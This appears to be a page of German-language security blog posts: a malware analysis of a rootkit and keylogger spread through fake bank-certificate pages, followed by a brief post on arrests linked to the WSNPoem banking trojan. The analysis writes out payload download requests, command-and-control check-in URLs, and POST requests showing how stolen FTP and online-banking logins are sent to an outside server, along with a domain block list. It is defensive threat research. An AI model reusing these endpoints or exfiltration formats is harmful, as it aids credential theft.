Search Results for 'UATelecom'

Page 3 of 4

Rootkit stiehlt FTP-, HTTP- und HTTPS-Logins

Trendmicro berichtete kürzlich von einem Trojaner, welcher FTP Logins aufzeichnet und diese zu einem Server sendet. Ich habe mir den Trojaner einmal etwas genauer angeschaut:

Der Trojaner verbreitet sich über infizierte Links in E-Mails. Klickt man auf einen der Links, gelangt man an eine der folgenden URLs:

http://ninonem.com/login.htm

http://repluy.com/login.htm

http://fgienrsi.com/GetStarted.htm

http://bberimc.com/GetStarted.htm

http://binrye.com/GetStarted.htm

http://unerixs.com/support.html

Die Domains werden auf einem FastFlux Botnet gehostet (Siehe dnsbl.abuse.ch FastFlux domain check):

Der Inhalt der Webseiten ist immer Derselbe:

Die Webseite möchte dem Besucher weiss machen, dass er doch das Security Plus Certificate der in der USA ansässigen Bank Wachovia herunterladen und installieren soll. In der Datei Sslupdate.exe befindet sich nicht etwas ein Sicherheits-Zertifikat, sonder viel mehr ein Trojaner namens Suceret / WebDown:

Filename: Sslupdate.exe
File size: 3188 bytes
MD5…: c4906f64d0ea19dab7a9e7626ee40781
SHA1..: 7301f0781b8a56f7b0fd59c531fa288d48c16d3e
Erkennungsrate: 16/36 (44.44%)

Führt man die Datei aus, nimmt der Trojaner sofort Kontakt mit lodnew.com auf, welche ebenfalls auf einem FastFlux Botnet gehostet wird, und lädt dort weiteren Schadcode nach:

GET http://loadnew.com/s.exe

Filename: s.exe
File size: 32256 bytes
MD5…: d951f3a8e3485c3c150ba17c0f53db86
SHA1..: 9d4e1df3237c34c85d14a5a477a5e2dc153edd42
Erkennungsrate: 5/36 (13.89%)

Der Trojaner richtet sich nun als Rootkit im System ein und installiert einen Keylogger der
Win32/Ursnif Familie:

C:\WINDOWS\9129837.exe
C:\WINDOWS\new_drv.sys
C:\WINDOWS\system32\8085.dll

Des Weiteren installiert der Trojaner einen Backdoor auf einem beliebigen TCP Port:

Nun kontaktiert er die Domain 1.alisiosanguera.com.cn (91.203.92.103):

GET 1.alisiosanguera.com.cn/cgi-bin/cmd.cgi?user_id=*HDSERIALNR*&version_id=289&passphrase=fkjvhsdvlksdhvlsd&socks=19726&version=125&crc=00000000

Bevor wir weiter auf diese URL eingehen, gibt es eine Quiz-Frage von mir: Was denkt ihr, in wessen Subnet liegt die IP-Adresse 91.203.92.103 (1.alisiosanguera.com.cn)? Genau, einmal mehr liegt diese IP-Adresse in den Händen der UATelecom! Bei Spamhaus gibt es auch bereits einen entsprechenden SBL dazu: SBL68462. Zurück zum Thema. In der URL werden folgende Informationen übermittelt:

user_id = Eindeutige Serien Nummer der HardDisk
version_id = ??
passphrase = ??
socks = TCP Port, auf welchem der Trojaner horcht
version= Version des installierten Trojaners
ctc= ??

Die genannte URL wird dabei in regelmässigen Abständen wieder kontaktiert. Soweit so gut. Richtig interessant wird es aber erst jetzt: Der Trojaner sammelt sämtliche Logins von HTTP, HTTPS und FTP Traffic und sendet die gestohlenen Logins an einen Server. Etwa im Fall einer FTP Verbindung sieht dies folgendermassen aus:

POST /cgi-bin/forms.cgi HTTP/1.1
User-Agent: IE
Host: 1.alisiosanguera.com.cn
Content-Length: 370
Cache-Control: no-cache

Content-Disposition: form-data; name=”upload_file”; filename=”4654654.342″
Content-Type: *ftpserver*.ch&ftp_login=anonymous&ftp_pass=IEUser@&version=0

Der Trojaner überträgt die IP Adresse des infizierten Servers inklusive Login sowie Server Adresse an den Server 1.alisiosanguera.com.cn (91.203.92.103). Das Gleiche gilt wie bereits erwähnt auch für HTTP und HTTPS Traffic. Hier das Beispiel eines eBanking Logins über eine scheinbar sichere HTTPS-Verbindung:

POST /cgi-bin/forms.cgi HTTP/1.1
User-Agent: IE
Host: 1.alisiosanguera.com.cn
Content-Length: 362
Cache-Control: no-cache

Content-Disposition: form-data; name=”upload_file”; filename=”4179642204.289″
Content-Type: application/octet-stream

URL: https://onlinebank.*.ch/?login
passw=*passwort*&login=*PIN/TAN*&p_userid=*vertragsnummer*

Wie man sehr schön sieht, überträgt der Trojaner URL, Vertragsnummer, Passwort sowie PIN/TAN der Onlinebank – die aber im Falle eines Einmal-PIN/TANs in diesem Moment für den Angreifer keinen Nutzen mehr hat. Ob Challenge-Response Verfahren moderner Telebanking-Systeme ebenfalls angegriffen werden, konnte ich mangels eines gültigen Kontos leider nicht testen.

Im Gegensatz zum Banken Trojaner WSNPoem und Torpig “schiesst” dieser Trojaner auf alles was ihm in die Quere kommt. Das heisst, er zielt nicht im Speziellen auf Banken oder andere spezifische Ziele ab sonder greift alles an, was nach einem Login aussieht. Der Einsatz von SSL schützt dabei nicht, da die Passwörter oberhalb des SSL-Layers abgegriffen wird.

Fazit

Die Spam-Mails, welche den Trojaner respektive die infizierten URLs beinhalten, werden derzeit zwar ausschliesslich in den USA versendet, jedoch ist die Malware (zumindest für mich) äusserst interessant: Am vergangenen Wochenende bin ich auf einen Command&Control Server gestossen, welcher einen anderen Trojaner mit FTP-Credentials von Webservern versorgt, damit dieser danach versucht, auf diesen Webservern DriveBy-Infektionen zu platzieren – also eine Infrastruktur zum verteilten Infizieren von Webservern. Es war mir möglich, dieses C&C anzuzapfen und mittlerweile eine (noch immer wachsende) Liste mit über 50′000 FTP Logins zu sammeln. Es ist anzunehmen, dass dieser Server eben über einen Keylogger wie dem Vorliegenden mit Passwörtern gefüttert wird. Möglicherweise besteht sogar ein direkter Zusammenhang zwischen diesen beiden Komponenten.

Es bleibt noch zu erwähnen, dass das Botnetz, welches die Domains hostet, früher bereites WSNPoem sowie verschiedene Money-Mule und phishing Domains gehostet hat.

Zu guter Letzt wie immer die Liste mit URLs und IPs, welche blockiert werden sollten:

  • ninonem.com
  • repluy.com
  • fgienrsi.com
  • bberimc.com
  • binrye.com
  • unerixs.com
  • securebbb.com
  • alisiosanguera.com.cn
  • loadnew.com
  • 91.203.92.103
  • WSNPoem: Täter verhaftet?

    Soeben erhielt ich die Nachricht, dass scheinbar die Täter hinter dem Banken Trojaner WSNPoem verhaftet wurden. Ein dementsprechendes Statement ist auf der Webseite der Niederländischen Staatsanwaltschaft (Openbaar Ministerie) zu finden:

    Niederländische Staatsanwaltschaft: Hacker arrested in Ukraine and Russia

    Der Artikel ist leider in Niederländisch geschrieben. Dank Google Translate lässt sich das Statement jedoch problemlos übersetzten:

    Die Täter wahren mit höchster Wahrscheinlichkeit auch Urheber der DDoS-Attacke auf abuse.ch sowie des Joe-jobs gegen meine Person im vergangenen August (Siehe Post: “DDoS Angriff & Joe Job gegen abuse.ch”).
    Hat sich also mein Kampf gegen die Kriminellen doch gelohnt?

    Weitere Infos folgen!

    Weiterführende Links

  • Niederländische Staatsanwaltschaft: Hacker arrested in Ukraine and Russia
  • wsnpoem: “Switzherland-Polina”
  • wsnpoem: “Der Vertrag”
  • EULA & Anleitung von wsnpoem
  • wsnpoem: Kostenauflistung.rar
  • wsnpoem: Rechnung.rar
  • wsnpoem: UPS_Lieferschein.zip
  • Hinter den Kulissen von wsnpoem
  • wsnpoem: Rechnung_S833.zip
  • wsnpoem: UPS_E9712.zip
  • wsnpoem in La_Poste_N8832.exe?
  • wsnpoem: IPLOGS.zip
  • wsnpoem per DriveBy-Infektion
  • UATelecom: WSNPoem, Emold und Cutwail



  • economics-recluse
    Scene
    Urgent!